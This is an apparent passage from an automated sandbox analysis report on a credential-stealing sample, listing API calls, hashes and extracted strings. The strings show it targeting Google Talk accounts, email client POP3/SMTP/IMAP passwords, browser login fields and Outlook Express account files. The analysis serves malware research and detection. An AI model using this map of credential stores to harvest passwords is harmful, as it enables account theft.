                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                          • String ID: Software\Google\Google Talk\Accounts$`{Oh
                                                                                          • API String ID: 3996936265-3809278426
                                                                                          • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                          • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3143880245-0
                                                                                          • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                          • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 381 44b33b-44b342 382 44b344-44b34a ??3@YAXPAX@Z 381->382 383 44b34b-44b352 381->383 382->383 384 44b354-44b35a ??3@YAXPAX@Z 383->384 385 44b35b-44b362 383->385 384->385 386 44b364-44b36a ??3@YAXPAX@Z 385->386 387 44b36b-44b372 385->387 386->387 388 44b374-44b37a ??3@YAXPAX@Z 387->388 389 44b37b 387->389 388->389
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 390 410dbb-410dd2 call 410d0e 393 410dd4-410ddd call 4070ae 390->393 394 410dfd-410e1b memset 390->394 401 410ddf-410de2 393->401 402 410dee-410df1 393->402 395 410e27-410e35 394->395 396 410e1d-410e20 394->396 400 410e45-410e4f call 410a9c 395->400 396->395 399 410e22-410e25 396->399 399->395 403 410e37-410e40 399->403 409 410e51-410e76 call 410d3d call 410add 400->409 410 410e7f-410e92 _mbscpy 400->410 401->394 405 410de4-410de7 401->405 408 410df8 402->408 403->400 405->394 407 410de9-410dec 405->407 407->394 407->402 412 410e95-410e97 408->412 409->410 410->412
                                                                                          APIs
                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                          • API String ID: 119022999-2036018995
                                                                                          • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                          • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 449 40ceb2 446->449 450 40cea8-40ceb0 446->450 448 40cebd-40cecc _strcmpi 447->448 451 40ced3-40cedc call 40cdda 448->451 452 40cece-40ced1 448->452 453 40ceb4-40ceb6 449->453 450->453 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->448 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                          APIs
                                                                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen$_strcmpimemset
                                                                                          • String ID: /stext
                                                                                          • API String ID: 520177685-3817206916
                                                                                          • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                          • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                          APIs
                                                                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID:
                                                                                          • API String ID: 145871493-0
                                                                                          • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                          • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                          APIs
                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                          • String ID:
                                                                                          • API String ID: 4165544737-0
                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                          APIs
                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                          • API String ID: 3963849919-1658304561
                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                          APIs
                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                          • memset.MSVCRT ref: 0040E5B8
                                                                                          • memset.MSVCRT ref: 0040E5CD
                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                          • memset.MSVCRT ref: 0040E6B5
                                                                                          • memset.MSVCRT ref: 0040E6CC
                                                                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                            • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                          • memset.MSVCRT ref: 0040E736
                                                                                          • memset.MSVCRT ref: 0040E74F
                                                                                          • sprintf.MSVCRT ref: 0040E76D
                                                                                          • sprintf.MSVCRT ref: 0040E788
                                                                                          • _strcmpi.MSVCRT ref: 0040E79E
                                                                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                          • memset.MSVCRT ref: 0040E858
                                                                                          • sprintf.MSVCRT ref: 0040E873
                                                                                          • _strcmpi.MSVCRT ref: 0040E889
                                                                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                          • API String ID: 4171719235-3943159138
                                                                                          • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                          • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                          • GetDC.USER32 ref: 004104E2
                                                                                          • strlen.MSVCRT ref: 00410522
                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                          • sprintf.MSVCRT ref: 00410640
                                                                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                          • GetClientRect.USER32(?,?), ref: 00410737
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                          • API String ID: 1703216249-3046471546
                                                                                          • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                          • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004024F5
                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                          • _mbscpy.MSVCRT(?,00000000,?,?,?,684F7B60,?,00000000), ref: 00402533
                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                          • API String ID: 168965057-606283353
                                                                                          • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                          • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                          • String ID:
                                                                                          • API String ID: 2998058495-0
                                                                                          • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                          • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                          APIs
                                                                                          • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                          • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                          • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                          • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                          • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                          • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmp$memcpy
                                                                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                          • API String ID: 231171946-2189169393
                                                                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
